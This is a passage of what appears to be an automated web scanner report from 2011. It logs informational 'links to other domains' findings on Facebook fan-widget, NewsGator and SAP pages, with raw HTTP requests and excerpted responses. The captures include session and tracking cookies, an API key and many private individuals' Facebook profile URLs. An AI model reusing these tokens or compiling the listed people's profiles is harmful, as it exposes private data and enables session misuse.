<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
</script>
       
       <link rel="stylesheet" type="text/css" href="//s7.addthis.com/static/r07/widget60.css" media="all"></link>
...[SNIP]...
17.14. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.108.108
X-Cnection: close
Date: Sat, 15 Oct 2011 14:41:45 GMT
Content-Length: 13465

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/4h6cHSZfzd4.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/_cfwtJx3PKr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tdzDCyl-epH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/MLA5OeE4JOL.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/aT2XtcxArxH.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/sapteched" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50503_74338051990_1862610_q.jpg" alt="SAP TechEd" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/ym/r/nMw9YWcvr3_.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Krishna.Kmr" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273632_1293506253_1172751346_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001011841719" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/195366_100001011841719_6154019_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ashishanand1989" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203281_1412659350_3982705_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002487729968" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273433_100002487729968_1074655775_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Vamsi143" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275740_100000910386663_2138401063_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pulkitabc1990" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275709_100001108591588_1716854672_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002857045372" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/274913_100002857045372_1417901079_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nagendersolan" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274066_100000724606128_290130261_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1781835606" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274684_1781835606_1182115330_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002433435784" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273650_100002433435784_163248874_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sathish.panduga" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/276388_100002397216185_594903539_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nimesh.shrivastava" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275638_1191250126_233712078_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002345442171" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274754_100002345442171_1956799898_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275665_622180976_774459654_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/vinit.divakar01" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275905_100000418459769_2904575_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002228686755" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195673_100002228686755_841743_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pranavram6" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276274_614790814_6023229_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/vikasjalaun" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274646_100001399574626_1284736821_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/prabir1991" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275528_100002094351833_733406805_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000873796841" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187064_100000873796841_4733144_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Anshu11777" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275974_100001189662098_197853048_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1159371759" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273849_1159371759_1367995196_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000351085564" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275944_100000351085564_6363283_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001124864994" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273879_100001124864994_1414702_q.jpg" alt="" /><div class="name">
...[SNIP]...
17.15. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.19.127
X-Cnection: close
Date: Sat, 15 Oct 2011 14:24:39 GMT
Content-Length: 13542

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/4h6cHSZfzd4.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/_cfwtJx3PKr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tdzDCyl-epH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/MLA5OeE4JOL.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/aT2XtcxArxH.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/sapteched" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50503_74338051990_1862610_q.jpg" alt="SAP TechEd" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/ym/r/nMw9YWcvr3_.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002433435784" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273650_100002433435784_163248874_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002228686755" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195673_100002228686755_841743_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002487729968" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273433_100002487729968_1074655775_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001825031691" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211714_100001825031691_296110458_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/vikasjalaun" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274646_100001399574626_1284736821_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001011841719" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/195366_100001011841719_6154019_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002129500251" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274811_100002129500251_1996013216_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Krishna.Kmr" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273632_1293506253_1172751346_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000869643416" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274348_100000869643416_894114778_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001654595532" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275829_100001654595532_1394183734_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001124864994" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273879_100001124864994_1414702_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nagendersolan" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274066_100000724606128_290130261_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pranavram6" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276274_614790814_6023229_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Vamsi143" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275740_100000910386663_2138401063_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/prabir1991" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275528_100002094351833_733406805_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275886_100001265179788_1701845280_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Anshu11777" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275974_100001189662098_197853048_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1159371759" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273849_1159371759_1367995196_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nimesh.shrivastava" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275638_1191250126_233712078_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001729531863" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186030_100001729531863_4099201_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sathish.panduga" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/276388_100002397216185_594903539_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002588341639" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273675_100002588341639_1081101218_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002214961696" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273668_100002214961696_1632062331_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000758164463" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275080_100000758164463_87405043_q.jpg" alt="" /><div class="name">
...[SNIP]...
17.16. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.connect.facebook.com/widgets/fan.php?api_key=77c9755ff1fc040d132a96ae7e11e5f5&channel_url=http%3A%2F%2Fwww.sapteched.com%2Femea%2Fabout%2Fwhoshouldattend.htm%3Ffbc_channel%3D1&id=74338051990&name=&width=680&connections=24&stream=0&logobar=1&css=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.23.120
X-Cnection: close
Date: Sat, 15 Oct 2011 14:24:03 GMT
Content-Length: 13779

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Fan</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/4h6cHSZfzd4.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/_cfwtJx3PKr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/tdzDCyl-epH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/MLA5OeE4JOL.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/aT2XtcxArxH.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/sapteched" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50503_74338051990_1862610_q.jpg" alt="SAP TechEd" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/ym/r/nMw9YWcvr3_.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002588341639" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273675_100002588341639_1081101218_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002487729968" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273433_100002487729968_1074655775_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nagendersolan" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274066_100000724606128_290130261_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/ashishanand1989" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203281_1412659350_3982705_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001654595532" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275829_100001654595532_1394183734_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000869643416" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274348_100000869643416_894114778_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pulkitabc1990" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275709_100001108591588_1716854672_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Anshu11777" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275974_100001189662098_197853048_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/sathish.panduga" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/276388_100002397216185_594903539_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000873796841" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187064_100000873796841_4733144_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001729531863" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186030_100001729531863_4099201_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/nimesh.shrivastava" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275638_1191250126_233712078_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Vamsi143" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275740_100000910386663_2138401063_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275665_622180976_774459654_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000758164463" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/275080_100000758164463_87405043_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=1781835606" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/274684_1781835606_1182115330_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002228686755" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195673_100002228686755_841743_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100000351085564" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/275944_100000351085564_6363283_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001825031691" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211714_100001825031691_296110458_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/pranavram6" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/276274_614790814_6023229_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001011841719" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/195366_100001011841719_6154019_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002857045372" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-ash2/274913_100002857045372_1417901079_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002433435784" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273650_100002433435784_163248874_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Krishna.Kmr" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/273632_1293506253_1172751346_q.jpg" alt="" /><div class="name">
...[SNIP]...
17.17. http://www.newsgator.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newsgator.com
Path:   /Default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Default.aspx?tabid=214 HTTP/1.1
Host: www.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.newsgator.com/Default.aspx?tabid=214
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=ec8-iODBzAEkAAAAM2Y5ZTY3NDAtNDgzMy00YjBhLTg2N2MtMDI2ZTg1ZTFiNjg00; ASP.NET_SessionId=quu5ty45zos3ltasqk3z1c45; AWSELB=D3C9758D18503E48094C60B777CFCD5D39CEEB1CDA0FEFFE2C0F391DFDF6C6C74534A9699866360E7B3EBF67845ED5C306076FE186CD8DBCB64619CCB5BB800B271F899D32; __utma=1.930474175.1318692366.1318692366.1318692366.1; __utmb=1.1.10.1318692366; __utmc=1; __utmz=1.1318692366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _msuuid_559f7m7161=B83D6312-A321-4C67-9DC3-466120C36492; _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028; language=en-US

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:26:01 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: language=en-US; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 39297
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<noscript><img src="http://tracker.marinsm.com/tp?act=1&cid=559f7m7161&script=no" ></noscript>
...[SNIP]...
<div id="dnn_ctr579_ModuleContent" class="DNNModuleContent ModCustomSearchC">
   
<link rel="stylesheet" type="text/css" href="http://www.google.com/cse/api/branding.css" />
<div id="dnn_ctr579_CustomSearch_divSearch" style="">
...[SNIP]...
<td><iframe scrolling="no" frameborder="0" allowtransparency="true" style="border:none; overflow:hidden; width:450px; height:21px;" src="http://www.facebook.com/plugins/like.php?app_id=168685723208922&amp;href=http%3A%2F%2Fwww.newsgator.com&amp;send=false&amp;layout=button_count&amp;width=450&amp;show_faces=false&amp;action=like&amp;colorscheme=light&amp;font&amp;height=21"></iframe>
...[SNIP]...
<br />
<a href="http://twitter.com/newsgator" target="_blank"><img width="16" height="17" align="absBottom" src="/Portals/0/social-media-icons/twitter_icon.png" alt="" /></a> <a href="http://twitter.com/newsgator" target="_blank">Follow us on Twitter</a><a href="http://www.facebook.com/NewsGator1"><br />
...[SNIP]...
<p style="text-align: left;"><a href="http://www.facebook.com/NewsGator1"><img width="16" height="17" align="absBottom" src="/Portals/0/icons/facebook_icon.png" alt="" /></a> <a href="http://www.facebook.com/NewsGator1" target="_blank">Like us on Facebook</a>
...[SNIP]...
<br />
<a href="http://www.linkedin.com/company/37905?trk=srch_hero_comp_name"><img width="16" height="16" align="absbottom" src="/Portals/0/icons/linkedin_icon.png" alt="" />
...[SNIP]...
<span style="color: rgb(153, 153, 153);"><a href="http://www.linkedin.com/company/37905?trk=srch_hero_comp_name">Join us on LinkedIn</a>
...[SNIP]...
<img width="16" height="17" align="absbottom" src="/Portals/0/icons/blog_icon.png" alt="" /> <a href="http://feeds.feedburner.com/NewsGator-Social-inSites" target="_blank">Subscribe to our Blog</a>
...[SNIP]...
</a> <a href="http://www.youtube.com/newsgatortv" target="_blank">Watch us on YouTube</a>
...[SNIP]...
</div>

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
17.18. http://www.sap.com/buy-now/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /buy-now/index.epx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /buy-now/index.epx?class=utilitynav-buy&_=1318689048629 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
